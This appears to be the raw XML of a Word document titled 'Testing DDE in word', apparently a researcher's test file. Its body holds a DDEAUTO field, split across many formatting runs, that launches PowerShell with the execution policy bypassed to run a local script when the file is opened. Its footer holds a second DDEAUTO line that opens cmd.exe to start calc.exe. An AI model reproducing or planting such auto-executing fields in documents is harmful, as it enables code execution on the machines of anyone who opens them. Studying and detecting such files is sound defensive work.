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EAA" w:rsidRDefault="007902E1" w:rsidP="007902E1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r>
        <w:t>Testing DDE in word</w:t>
      </w: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Pr="00572906" w:rsidRDefault="00572906" w:rsidP="007902E1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00572906">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> DDEAUT</w:instrText>
      </w:r>
      <w:r w:rsidR="003D3AAB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve">O </w:instrText>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk497430309"/>
      <w:r w:rsidR="003D3AAB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>c:\\windows\\s</w:instrText>
      </w:r>
      <w:r w:rsidR="00B90EBF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>ystem32\\</w:instrText>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:r w:rsidR="00B90EBF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>WindowsPowerShell</w:instrText>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidR="00B90EBF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>\\v1.0\</w:instrText>
      </w:r>
      <w:r w:rsidR="0052658B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>\</w:instrText>
      </w:r>
      <w:r w:rsidR="00B90EBF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>powershell.exe</w:instrText>
      </w:r>
      <w:r w:rsidR="00287EBD">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve">  </w:instrText>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00E11138">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="006373DE">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>/</w:instrText>
      </w:r>
      <w:r w:rsidR="005D2F09">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>c</w:instrText>
      </w:r>
      <w:r w:rsidR="00406174">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00871A55" w:rsidRPr="00871A55">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>powershell -ExecutionPolicy ByPass -File go.ps1</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00393AB9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Error! No topic specified.</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w: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7902E1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00481EAA" w:rsidRDefault="00481EAA" w:rsidP="00481EAA">
      <w:pPr>
        <w:pStyle w:val="Footer"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00481EAA" w:rsidRDefault="00481EAA" w:rsidP="00481EAA">
      <w:pPr>
        <w:pStyle w:val="Footer"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00481EAA" w:rsidRDefault="00481EAA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DE438D" w:rsidRDefault="00DE438D" w:rsidP="007902E1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0017154E" w:rsidRPr="00DE438D" w:rsidRDefault="0017154E" w:rsidP="007902E1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0017154E" w:rsidRPr="00DE438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315" w:rsidRDefault="002C7315" w:rsidP="00DE438D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="002C7315" w:rsidRDefault="002C7315" w:rsidP="00DE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C29" w:rsidRPr="00481EAA" w:rsidRDefault="00E32C29" w:rsidP="00DE438D">
    <w:pPr>
      <w:pStyle w:val="HTMLPreformatted"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:rPr>
        <w:color w:val="FF0000"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00481EAA">
      <w:rPr>
        <w:color w:val="FF0000"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  </w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00E32C29" w:rsidRDefault="00E32C29">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="00E32C29" w:rsidRDefault="00E32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315" w:rsidRDefault="002C7315" w:rsidP="00DE438D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="002C7315" w:rsidRDefault="002C7315" w:rsidP="00DE4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E1"/>
    <w:rsid w:val="00017AE1"/>
    <w:rsid w:val="0005719C"/>
    <w:rsid w:val="00083A5A"/>
    <w:rsid w:val="000A30CD"/>
    <w:rsid w:val="000B5393"/>
    <w:rsid w:val="000C1D61"/>
    <w:rsid w:val="000C35BA"/>
    <w:rsid w:val="0010142C"/>
    <w:rsid w:val="001239D9"/>
    <w:rsid w:val="0017154E"/>
    <w:rsid w:val="001736C5"/>
    <w:rsid w:val="001B569D"/>
    <w:rsid w:val="001E490E"/>
    <w:rsid w:val="002375BB"/>
    <w:rsid w:val="002439F9"/>
    <w:rsid w:val="0027124B"/>
    <w:rsid w:val="00287EBD"/>
    <w:rsid w:val="002A5FE6"/>
    <w:rsid w:val="002B6D62"/>
    <w:rsid w:val="002C7315"/>
    <w:rsid w:val="00313B26"/>
    <w:rsid w:val="00323EB7"/>
    <w:rsid w:val="00324EAB"/>
    <w:rsid w:val="00341879"/>
    <w:rsid w:val="00393AB9"/>
    <w:rsid w:val="003C7DB2"/>
    <w:rsid w:val="003D3AAB"/>
    <w:rsid w:val="00406174"/>
    <w:rsid w:val="00481EAA"/>
    <w:rsid w:val="004C3E1C"/>
    <w:rsid w:val="004C6D6E"/>
    <w:rsid w:val="00513A62"/>
    <w:rsid w:val="0052658B"/>
    <w:rsid w:val="00531A2D"/>
    <w:rsid w:val="00572906"/>
    <w:rsid w:val="00572A2A"/>
    <w:rsid w:val="00581E66"/>
    <w:rsid w:val="00587E07"/>
    <w:rsid w:val="005D2F09"/>
    <w:rsid w:val="005D47A6"/>
    <w:rsid w:val="00625D0C"/>
    <w:rsid w:val="006373DE"/>
    <w:rsid w:val="00717824"/>
    <w:rsid w:val="007902E1"/>
    <w:rsid w:val="007C1404"/>
    <w:rsid w:val="0083261E"/>
    <w:rsid w:val="00871A55"/>
    <w:rsid w:val="00912555"/>
    <w:rsid w:val="009B1EEE"/>
    <w:rsid w:val="009C71A0"/>
    <w:rsid w:val="009F3090"/>
    <w:rsid w:val="00A57A8A"/>
    <w:rsid w:val="00AB2313"/>
    <w:rsid w:val="00AD39FE"/>
    <w:rsid w:val="00AE6FB7"/>
    <w:rsid w:val="00B90EBF"/>
    <w:rsid w:val="00BB0AA0"/>
    <w:rsid w:val="00BF065F"/>
    <w:rsid w:val="00C1073C"/>
    <w:rsid w:val="00D83C7E"/>
    <w:rsid w:val="00DE438D"/>
    <w:rsid w:val="00E11138"/>
    <w:rsid w:val="00E32C29"/>
    <w:rsid w:val="00E9678C"/>
    <w:rsid w:val="00EA645E"/>
    <w:rsid w:val="00EF16E8"/>
    <w:rsid w:val="00F6519C"/>
    <w:rsid w:val="00FF19C6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98228-46AF-4AA7-AA34-A9935D1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2E1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7902E1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DE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8D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DE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5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Dulin</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Dulin, Maxwell John</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-11-25T02:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-02T19:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>